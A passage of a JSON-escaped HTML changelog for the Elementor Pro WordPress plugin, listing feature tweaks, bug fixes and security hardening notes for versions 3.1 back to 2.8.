href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8569\\\">#8569<\\/a>)<\\/li>\\n<li>Tweak: Added an option to set Selected color for Typing effect in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5403\\\">#5403<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7826\\\">#7826<\\/a>)<\\/li>\\n<li>Tweak: Added animation Loop option for Animated Headline (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9749\\\">#9749<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2457\\\">#2457<\\/a>)<\\/li>\\n<li>Tweak: Added timing options for Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4392\\\">#4392<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic capabilities for Testimonial Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8569\\\">#8569<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic capabilities for Price Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4242\\\">#4242<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8569\\\">#8569<\\/a>)<\\/li>\\n<li>Tweak: Added Word Wrap control to Code Highlight widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13577\\\">#13577<\\/a>)<\\/li>\\n<li>Tweak: Upgraded Font Awesome Pro library to v5.15.1<\\/li>\\n<li>Tweak: Improved method of loading field mapping repeater in Form widget (<a href=\\\"https:\\/\\/developers.elementor.com\\/how-to-add-a-repeater-control-to-elementor-add-on\\/\\\">Developer Documentation<\\/a>)<\\/li>\\n<li>Tweak: Added "Show on Browsers" Popup Advanced Rule<\\/li>\\n<li>Tweak: Added real-time JS handling to prevent redundant renders in Slides widget and all Carousel widgets<\\/li>\\n<li>Tweak: Import scroll utility from core and remove it from Pro<\\/li>\\n<li>Tweak: Added alignment options for Post Excerpt widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9757\\\">#9757<\\/a>)<\\/li>\\n<li>Tweak: Changed alignment control to work with selectors in Share Buttons<\\/li>\\n<li>Tweak: Upgraded to Webpack 5, Grunt-Webpack 4 and TerserPlugin instead of UglifyJsPlugin<\\/li>\\n<li>Fix: Steps Divider is not vertically aligned in Multi Step Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12569\\\">#12569<\\/a>)<\\/li>\\n<li>Fix: Slides are playing in an infinite loop mode even when the option is disabled in Slides Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6726\\\">#6726<\\/a>)<\\/li>\\n<li>Fix: Redundant spacing is added to Share Buttons widget<\\/li>\\n<li>Fix: Step buttons text is not updated without a page reload in Forms widget<\\/li>\\n<li>Fix: Overflow issue in certain animations in Animated Headline widget<\\/li>\\n<li>Fix: When dragging a new Testimonial Carousel there is a console error thrown<\\/li>\\n<li>Fix: Step Buttons are cut in mobile view in Multi Step Form<\\/li>\\n<li>Fix: Submit and Step buttons size differences when using Twenty Twenty theme<\\/li>\\n<li>Fix: Duplicate button Text Color control in Slides widget<\\/li>\\n<li>Fix: JS error is thrown when editing and saving global widgets<\\/li>\\n<li>Fix: <code>get_version<\\/code> API function may fail with Redis \\/ DB cache<\\/li>\\n<li>Fix: Multiple license check requests are created in certain cases<\\/li>\\n<li>Deprecated: Deprecate methods prefixed with an underscore and replace them with unprefixed methods<\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v3-1-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>3.0.10 - 2021-01-20<\\/h4>\\n<ul>\\n<li>Tweak: Added Editing Handles string translation compatibility with Elementor v3.1.0<\\/li>\\n<\\/ul>\\n<h4>3.0.9 - 2020-12-29<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility to support Elementor 3.1.0<\\/li>\\n<li>Fix: Wrong phrasing of Import template success message in Theme Builder<\\/li>\\n<li>Fix: Border color glitch in Theme Builder<\\/li>\\n<\\/ul>\\n<h4>3.0.8 - 2020-11-26<\\/h4>\\n<ul>\\n<li>Fix: Navigation arrows UI glitch in Media Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13172\\\">#13172<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.0.7 - 2020-11-25<\\/h4>\\n<ul>\\n<li>Fix: Console Error when dragging Testimonials Carousel widget<\\/li>\\n<li>Fix: Arrows of Testimonial and Reviews Carousel widgets navigate to the wrong direction in RTL websites<\\/li>\\n<li>Fix: Removed the conditional loading of Webpack<\\/li>\\n<li>Fix: Fatal error is thrown after deleting an associated custom taxonomy when Posts widget with Cards skin has a badge<\\/li>\\n<li>Fix: Upload JSON files only when the user allowed to prevent security issues<\\/li>\\n<li>Fix: Gallery not displayed in Theme Builder templates preview<\\/li>\\n<\\/ul>\\n<h4>3.0.6 - 2020-11-04<\\/h4>\\n<ul>\\n<li>Tweak: Updated the embedded post in Facebook Embed widget<\\/li>\\n<li>Fix: Minor UI glitches in Theme Builder\'s conditions screen footer<\\/li>\\n<li>Fix: Template type changes into Single Page after conditions change in Theme Builder<\\/li>\\n<li>Fix: Redundant Custom Caption option in Site Logo widget<\\/li>\\n<li>Fix: Removed unused code in Drip integration<\\/li>\\n<li>Fix: Removed Weibo and WeChat social networks due to website and links inactivity from Share Buttons widget<\\/li>\\n<li>Fix: Removed redundant code from Portfolio and Post Navigation widgets<\\/li>\\n<\\/ul>\\n<h4>3.0.5 - 2020-09-23<\\/h4>\\n<ul>\\n<li>Fix: If the default page layout is set to "Canvas" Headers and Footers cannot be edited<\\/li>\\n<li>Fix: Product Image Dynamic Tag throws an error when no image is set<\\/li>\\n<li>Fix: Missing Single document placeholder in Theme Builder<\\/li>\\n<li>Fix: Document editing handles inherit the <code>font-family<\\/code> from 3rd party source<\\/li>\\n<li>Fix: Can\'t add linebreaks to Textarea input when used as Multi Step Form<\\/li>\\n<li>Fix: Incorrect width in Facebook Page widget<\\/li>\\n<li>Fix: Added compatibility to allow the use of \'get_create_url\' in Theme Builder<\\/li>\\n<\\/ul>\\n<h4>3.0.4 - 2020-09-09<\\/h4>\\n<ul>\\n<li>Fix: Autogenerated screenshots appear in WP Media Library modal (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12304\\\">#12304<\\/a>)<\\/li>\\n<li>Fix: Make sure Elementor Posts widget Pagination doesn\'t interfere with 3rd party plugins (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12126\\\">#12126<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12127\\\">#12127<\\/a>)<\\/li>\\n<li>Fix: Shrinking conditions indicator in Theme Builder<\\/li>\\n<li>Fix: Column can\'t be dragged and dropped if it populates a Global widget<\\/li>\\n<li>Fix: Styles are missing from Single templates in some edge cases<\\/li>\\n<\\/ul>\\n<h4>3.0.3 - 2020-09-02<\\/h4>\\n<ul>\\n<li>Fix: Pagination doesn\'t work in WordPress 5.5 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12126\\\">#12126<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12127\\\">#12127<\\/a>)<\\/li>\\n<li>Fix: Change delete template action to "Move to Trash" in the new Theme Builder view<\\/li>\\n<\\/ul>\\n<h4>3.0.2 - 2020-08-31<\\/h4>\\n<ul>\\n<li>Tweak: Replaced WordPress "Learn More" links with dynamic links for better control over time (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12312\\\">#12312<\\/a>)<\\/li>\\n<li>Tweak: UI tweaks to the Conditions screen In the new Theme Builder<\\/li>\\n<li>Fix: Motion Effects not working when assigned to a column and throws JS error when DOM optimization is disabled (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12299\\\">#12299<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12275\\\">#12275<\\/a>)<\\/li>\\n<li>Fix: Multiple Galleries display all the images in the Lightbox slideshow (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11809\\\">#11809<\\/a>)<\\/li>\\n<li>Fix: Old Theme Builder is being opened when accessing through the Finder<\\/li>\\n<li>Fix: Mixed templates import glitch in Theme Builder<\\/li>\\n<li>Fix: Card icon sizes in Theme Builder<\\/li>\\n<li>Fix: Preview button leads to <code>render_mode<\\/code> instead of preview when importing a template from the new Theme Builder<\\/li>\\n<\\/ul>\\n<h4>3.0.1 - 2020-08-26<\\/h4>\\n<ul>\\n<li>Tweak: Keep previous Theme Builder when accessing from the WP Dashboard for legacy support<\\/li>\\n<li>Tweak: Updated video tutorials in Theme Builder<\\/li>\\n<li>Tweak: Don\'t show auto-screenshots in the Media Library (Props <a href=\\\"https:\\/\\/github.com\\/black-eye\\\">@black-eye<\\/a>)<\\/li>\\n<li>Fix: Repeater items throws <code>childView<\\/code> is undefined message in Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12239\\\">#12239<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12221\\\">#12221<\\/a>)<\\/li>\\n<li>Fix: Misspelling of the word "occurred" in Form widget default error message (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12137\\\">#12137<\\/a>)<\\/li>\\n<li>Fix: Facebook comments not showing up (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12157\\\">#12157<\\/a>)<\\/li>\\n<li>Fix: Check for conflicts in Theme Builder doesn\'t work properly<\\/li>\\n<li>Fix: Minor UI fixes in Theme Builder<\\/li>\\n<li>Fix: Dark mode glitches in Theme Builder<\\/li>\\n<li>Fix: Global Site Part toaster appears when you publish a Popup<\\/li>\\n<li>Fix: Site Parts aren\'t in the correct order in Theme Builder<\\/li>\\n<li>Fix: Date field caused forms to get corrupted in Forms widget<\\/li>\\n<li>Fix: Theme Builder application page is forbidden<\\/li>\\n<\\/ul>\\n<h4>3.0.0 - 2020-08-23<\\/h4>\\n<ul>\\n<li>New: Introducing the new and improved Theme Builder<\\/li>\\n<li>Tweak: Removed <code>.elementor-inner<\\/code> and <code>.elementor-column-wrap<\\/code> from DOM output to improve performance (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7351\\\">#7351<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7817\\\">#7817<\\/a>, <a href=\\\"https:\\/\\/developers.elementor.com\\/dom-improvements-ahead-html-wrappers-removal-from-v3-0\\/\\\">Developers Blog Post<\\/a>)<\\/li>\\n<li>Tweak: Added contextual anchors ID support to Table of Contents widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10052\\\">#10052<\\/a>)<\\/li>\\n<li>Tweak: Added WeChat and Weibo social networks to Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11554\\\">#11554<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic capabilities for Redirect after Login\\/Logout in Login widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11343\\\">#11343<\\/a>)<\\/li>\\n<li>Tweak: Added Blend Mode and CSS Filters controls to adjust the Background Overlay in Flipbox widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11653\\\">#11653<\\/a>)<\\/li>\\n<li>Tweak: Added responsive capabilities to Toggle Button styling in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8269\\\">#8269<\\/a>)<\\/li>\\n<li>Tweak: Added responsive Text Alignment control in Call to Action widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11968\\\">#11968<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic content to Ribbon element in Call to Action widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10364\\\">#10364<\\/a>)<\\/li>\\n<li>Tweak: Converted uses of Color and Typography Schemes to Global Colors and Fonts<\\/li>\\n<li>Tweak: Separated Title and Description control fields labels in Call to Action widget<\\/li>\\n<li>Tweak: Removed unnecessary style in WC Product with variations<\\/li>\\n<li>Tweak: Converted Portfolio, Posts and Share Buttons widgets to use CSS Variable-based Elementor Grid (<a href=\\\"https:\\/\\/developers.elementor.com\\/elementor-dropping-support-ie\\/\\\">Developers Blog Post<\\/a>)<\\/li>\\n<li>Tweak: Added Date Modified option to Posts widget metadata<\\/li>\\n<li>Fix: PHP 7.4 compatibility to Media Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11355\\\">#11355<\\/a>)<\\/li>\\n<li>Fix: Divider alignment issue in Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11628\\\">#11628<\\/a>)<\\/li>\\n<li>Fix: Color doesn\\u2019t change in Products Archive Description widget<\\/li>\\n<li>Fix: WC Product variations layout breaks when using Variation Swatches plugin<\\/li>\\n<li>Fix: WC Product variations layout issue<\\/li>\\n<li>Fix: WC Product variations mobile zoom-in glitch<\\/li>\\n<li>Fix: Can\'t edit a Popup after accessing Theme Style<\\/li>\\n<li>Fix: Twitter icon missing in Blockquote widget<\\/li>\\n<li>Fix: Removed redundant default text color from Share Buttons minimal skin<\\/li>\\n<li>Fix: UI glitch in Display Conditions modal<\\/li>\\n<li>Fix: Insert template button UI glitch in Templates Library<\\/li>\\n<li>Fix: Added sanitization to post titles in WordPress dashboard for better security<\\/li>\\n<li>Fix: Show when arriving from search engines rule doesn\'t work in Popup<\\/li>\\n<li>Fix: Child categories are shown with a different parent category in Query control<\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v3-0-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>2.10.3 - 2020-06-29<\\/h4>\\n<ul>\\n<li>Fix: Form not being submitted when using "Progress Bar" and "None" view types in Multi Step Form (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11596\\\">#11596<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11610\\\">#11610<\\/a>)<\\/li>\\n<li>Fix: Missing "for" attribute in Password field label in Login widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8646\\\">#8646<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.10.2 - 2020-06-16<\\/h4>\\n<ul>\\n<li>Fix: Run step events only when in Multi Step Form mode (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11644\\\">#11644<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.10.1 - 2020-06-16<\\/h4>\\n<ul>\\n<li>Tweak: Improved License validation mechanism to avoid limitations<\\/li>\\n<li>Tweak: Changed control labels and ordering in Price Table, Lottie and Form widgets<\\/li>\\n<li>Fix: Popup close button vertical position glitch (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10921\\\">#10921<\\/a>)<\\/li>\\n<li>Fix: Radio field placement glitch when in Multi Step mode in Form widget<\\/li>\\n<li>Fix: Clicking <code>Enter<\\/code> key submits the form in Multi Step Form<\\/li>\\n<li>Fix: Hardened sanitization in Custom Attributes to avoid security issues<\\/li>\\n<\\/ul>\\n<h4>2.10.0 - 2020-06-07<\\/h4>\\n<ul>\\n<li>New: Introducing Multi-Step Forms - Breakdown long forms into simple steps (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5975\\\">#5975<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3911\\\">#3911<\\/a>)<\\/li>\\n<li>New: Introducing Lottie widget - easily add Lottie animations to your site, no coding needed (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11026\\\">#11026<\\/a>)<\\/li>\\n<li>Tweak: Added spacing option to Posts widget pagination (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5682\\\">#5682<\\/a>)<\\/li>\\n<li>Tweak: Changed texts and logic for administrator plugin renewal notices<\\/li>\\n<li>Tweak: Added new Scroll Util for improved scrolling handling<\\/li>\\n<li>Tweak: Improved Motion Effects animation performance<\\/li>\\n<\\/ul>\\n<h4>2.9.5 - 2020-05-24<\\/h4>\\n<ul>\\n<li>Fix: Added sanitization to Custom Attributes control to avoid security issue<\\/li>\\n<\\/ul>\\n<h4>2.9.4 - 2020-05-07<\\/h4>\\n<ul>\\n<li>Fix: Hardened user role that is allowed to upload icon sets and unzip only allowed files in Custom Icons to prevent security vulnerability<\\/li>\\n<\\/ul>\\n<h4>2.9.3 - 2020-04-19<\\/h4>\\n<ul>\\n<li>Fix: Form shortcode IDs are not wrapped in double-quotes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11023\\\">#11023<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10932\\\">#10932<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10967\\\">#10967<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11000\\\">#11000<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11049\\\">#11049<\\/a>)<\\/li>\\n<li>Fix: Escaped Form records metadata to prevent security vulnerability<\\/li>\\n<li>Fix: Closing "Save Changes" document confirmation modal causes Panel infinite loading<\\/li>\\n<li>Fix: Ken Burns effect not working when there is only one slide in Slides widget<\\/li>\\n<li>Fix: Document handles UI glitch<\\/li>\\n<\\/ul>\\n<h4>2.9.2 - 2020-03-25<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility with WordPress v5.4 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10745\\\">#10745<\\/a>)<\\/li>\\n<li>Fix: Image ratio number is displayed under the Archive Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10874\\\">#10874<\\/a>)<\\/li>\\n<li>Fix: Theme Style Link color setting overrides the Table of Content list style<\\/li>\\n<li>Fix: PHP notice when using dynamic user info <code>id<\\/code><\\/li>\\n<li>Fix: Navigation arrows direction is crossed on first drag in Slides Widget<\\/li>\\n<li>Fix: "No headings were found on this page" message was not displayed in the frontend in Table of Contents widget<\\/li>\\n<li>Fix: Container includes Popup tags by default in Table of Contents widget<\\/li>\\n<li>Fix: Twitter icon display issue when Font Awesome 4 support is disabled in Blockquote widget<\\/li>\\n<li>Fix: ACF Dynamic tag not working in Form widget Redirect action<\\/li>\\n<\\/ul>\\n<h4>2.9.1 - 2020-03-16<\\/h4>\\n<ul>\\n<li>Fix: Can\'t access Elementor Editor when there is Page Title widget in the page<\\/li>\\n<li>Fix: Applying styling to Post Content widget affects the Page and Post editing handles<\\/li>\\n<\\/ul>\\n<h4>2.9.0 - 2020-03-15<\\/h4>\\n<ul>\\n<li>New: Introducing Full Site Editing: Design header, footer, and content all in one place! (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4985\\\">#4985<\\/a>)<\\/li>\\n<li>New: Added Global Custom CSS for Your Entire Site in Theme Style (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3345\\\">#3345<\\/a>)<\\/li>\\n<li>New: Added Dynamic Colors tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6485\\\">#6485<\\/a>)<\\/li>\\n<li>Tweak: Added option to set the Site Part HTML Wrapper Tags (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9293\\\">#9293<\\/a>)<\\/li>\\n<li>Tweak: Added Link Attributes support to Pro widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5716\\\">#5716<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3642\\\">#3642<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9225\\\">#9225<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9079\\\">#9079<\\/a>)<\\/li>\\n<li>Tweak: Added Theme Style support in Theme Builder parts (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10564\\\">#10564<\\/a>)<\\/li>\\n<li>Tweak: Avoid creating empty Custom Font<\\/li>\\n<li>Tweak: Added <code>aria-expanded<\\/code> attribute to Menu Cart widget<\\/li>\\n<li>Tweak: Moved Link Actions module to Core plugin<\\/li>\\n<li>Tweak: Changed the name of \\u201cTypeKit Web Fonts by Adobe\\u201d to \\u201cAdobe Fonts\\u201d<\\/li>\\n<li>Tweak: Removed redundant display conditions from Blockquote, Flipbox, Price Table, and Search Form widgets<\\/li>\\n<li>Tweak: Pro widgets are not draggable unless Elementor license has been activated<\\/li>\\n<li>Tweak: Remove redundant <code>label_block<\\/code> parameters from several controls<\\/li>\\n<li>Tweak: Converted controls selectors to CSS variables in Gallery widget<\\/li>\\n<li>Tweak: Replaced Stumbleupon with Mix in Reviews widget recommended icons (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10099\\\">#10099<\\/a>)<\\/li>\\n<li>Tweak: Added Mix to the Share Buttons network list (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10099\\\">#10099<\\/a>)<\\/li>\\n<li>Tweak: Added "Open in new tab" option to Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7924\\\">#7924<\\/a>)<\\/li>\\n<li>Tweak: Upgraded Font Awesome Pro library to v5.12.0<\\/li>\\n<li>Tweak: Added new Lightbox compatibility for Gallery and Media Carousel widgets<\\/li>\\n<li>Tweak: Expose external API for Swiper instances<\\/li>\\n<li>Tweak: Added compatibility to JS API in Theme Builder, Popups, Form widget and Global widget<\\/li>\\n<li>Tweak: Replaced nerd icons with new Elementor emojis<\\/li>\\n<li>Tweak: Added specific <code>color<\\/code> attribute to header title in Table of Contents widget<\\/li>\\n<li>Fix: Line break issues in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10585\\\">#10585<\\/a>)<\\/li>\\n<li>Fix: Theme Style Link color overrides the Table of Content list style<\\/li>\\n<li>Fix: Active state glitches when using Table of contents widget with Sticky mode<\\/li>\\n<li>Fix: "Graphic Element" section appears as empty in case of unmarked Graphic Element in Call to Action widget<\\/li>\\n<li>Fix: Page Title widget render glitches in the Editor<\\/li>\\n<li>Fix: Image ratio parameter visible in some edge cases in Posts widget<\\/li>\\n<li>Fix: Image missing when sharing to Pinterest using Share Buttons widget<\\/li>\\n<li>Fix: Theme Style Link color setting override the list style in Table of Contents widget<\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v2-9-0-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>2.8.5 - 2020-03-08<\\/h4>\\n<ul>\\n<li>Tweak: Added new Swiper parameter to all Pro carousels to allow 3rd party integration<\\/li>\\n<li>Fix: Missing closing bracket in Animated Headline widget<\\/li>\\n<li>Fix: Share buttons widgets show Font Awesome 4 icons on first drag in Editor<\\/li>\\n<\\/ul>\\n<h4>2.8.4 - 2020-02-16<\\/h4>\\n<ul>\\n<li>Tweak: Added Lightbox Title & Description support to Gallery widget<\\/li>\\n<li>Tweak: Added RTL support for Slides widget<\\/li>\\n<li>Tweak: Display Lightbox images in Full size in Gallery widget<\\/li>\\n<li>Fix: Template with Slides widget not working properly when placed inside Tabs, Accordion and Toggle widget<\\/li>\\n<li>Fix: Dropdown menu lost styling after Elementor Pro v2.8 upgrade in Nav Menu widget<\\/li>\\n<li>Fix: Indent doesn\'t work on RTL websites in Table of Contents widget<\\/li>\\n<li>Fix: Query Control throws <code>Undefined index: q<\\/code> error<\\/li>\\n<li>Fix: Typography control not affecting dropdown menu in Nav Menu widget<\\/li>\\n<li>Fix: Discord forms integration fails to send submissions in some server configurations<\\/li>\\n<li>Fix: Rotating headlines don\'t align center in Animated Headline widget<\\/li>\\n<li>Fix: Custom secondary color displayed when not needed in Share buttons widget<\\/li>\\n<li>Fix: Motion Effects of certain objects are not functioning properly on Safari browser<\\/li>\\n<li>Fix: Missing eye icon in Single template footer preview button<\\/li>\\n<\\/ul>\\n<h4>2.8.3 - 2020-01-01<\\/h4>\\n<ul>\\n<li>Tweak: Updated Table of Contents widget panel location<\\/li>\\n<li>Fix: ACF URL Dynamic field throws <code>undefined index<\\/code> PHP notice (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9929\\\">#9929<\\/a>)<\\/li>\\n<li>Fix: Gallery lightbox pagination shows images from all tabs<\\/li>\\n<li>Fix: "Reply To" option not working in Form widget "Email 2" Action<\\/li>\\n<li>Fix: ACF Dynamic tag not working in Form widget Redirect action<\\/li>\\n<li>Fix: Underline option not working in Table of Contents widget Normal state<\\/li>\\n<li>Fix: Query Control <code>Undefined index: autocomplete<\\/code> notice in some cases<\\/li>\\n<li>Fix: Missing display condition to Read More Spacing control in Posts widget<\\/li>\\n<\\/ul>\\n<h4>2.8.2 - 2019-12-19<\\/h4>\\n<ul>\\n<li>Tweak: Improved scroll-spy and collapsing functionality in Table of Contents widget<\\/li>\\n<li>Fix: "No products were found" message not being displayed in an empty Products Archive<\\/li>\\n<li>Fix: Redundant <code><br><\\/code> tags in Single theme template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9927\\\">#9927<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9928\\\">#9928<\\/a>)<\\/li>\\n<li>Fix: Draft Popup shows up in Dynamic tag dropdown<\\/li>\\n<\\/ul>\\n<h4>2.8.1 - 2019-12-18<\\/h4>\\n<ul>\\n<li>Fix: Share Buttons widget not working (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9920\\\">#9920<\\/a>)<\\/li>\\n<li>Fix: Redundant <code><p><\\/code> tags added to Single Template posts<\\/li>\\n<\\/ul>\\n<h4>2.8.0 - 2019-12-18<\\/h4>\\n<ul>\\n<li>New: Table of Contents Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5171\\\">#5171<\\/a>)<\\/li>\\n<li>New: Added Font Awesome Pro Duotone font family support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9578\\\">#9578<\\/a>)<\\/li>\\n<li>Tweak: Added Lazy Load option to Gallery widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9763\\\">#9763<\\/a>)<\\/li>\\n<li>Tweak: Added Random order option to Gallery widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9269\\\">#9269<\\/a>)<\\/li>\\n<li>Tweak: Updated Font Awesome Pro to v5.11.2 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9578\\\">#9578<\\/a>)<\\/li>\\n<li>Tweak: Added preselect support for multiple default select values in Forms Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9324\\\">#9324<\\/a>)<\\/li>\\n<li>Tweak: Avoid duplicate queries for Custom Icons (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9579\\\">#9579<\\/a>)<\\/li>\\n<li>Tweak: Major performance improvements to Gallery widget<\\/li>\\n<li>Tweak: Avoid non-existing images in Gallery widget<\\/li>\\n<li>Tweak: Added <code>tabindex<\\/code>, <code>aria-expanded<\\/code>, <code>aria-hidden<\\/code> and <code>role=\\\"navigation\\\"<\\/code> accessibility attributes to Nav Menu widget<\\/li>\\n<li>Tweak: Changed button HTML tag from <code>button<\\/code> to <code>span<\\/code> in Call to Action and Flip Box widgets for better W3C compliance and accessibility<\\/li>\\n<li>Tweak: Removed Google+ from default networks in Share Buttons widget<\\/li>\\n<li>Tweak: Added compatibility for Library Connect<\\/li>\\n<li>Tweak: Added i18n to Toolset date dynamic tag<\\/li>\\n<li>Tweak: Added external link support to Gallery widget<\\/li>\\n<li>Tweak: Changed the link external attributes implementation to use <code>add_link_attributes()<\\/code> in Gallery widget<\\/li>\\n<li>Tweak: Updated references to the new Schemes system location<\\/li>\\n<li>Tweak: Avoid running Gallery handler when the gallery is empty<\\/li>\\n<li>Tweak: UI Tweaks in Editor Panel<\\/li>\\n<li>Tweak: Added responsive capabilities to Pointer Width control in Nav Menu widget<\\/li>\\n<li>Tweak: Added mobile support for responsive controls in Nav Menu widget<\\/li>\\n<li>Tweak: Refactor <code>register_controls()<\\/code> method in Posts widget skin trait<\\/li>\\n<li>Fix: ACF URL "undefined Index" notice (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7646\\\">#7646<\\/a>)<\\/li>\\n<li>Fix: WooCommerce Mini-Cart widget causes fatal error in edge cases (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9304\\\">#9304<\\/a>)<\\/li>\\n<li>Fix: <code>PHP Notice: Undefined index<\\/code> display for Author query (<a 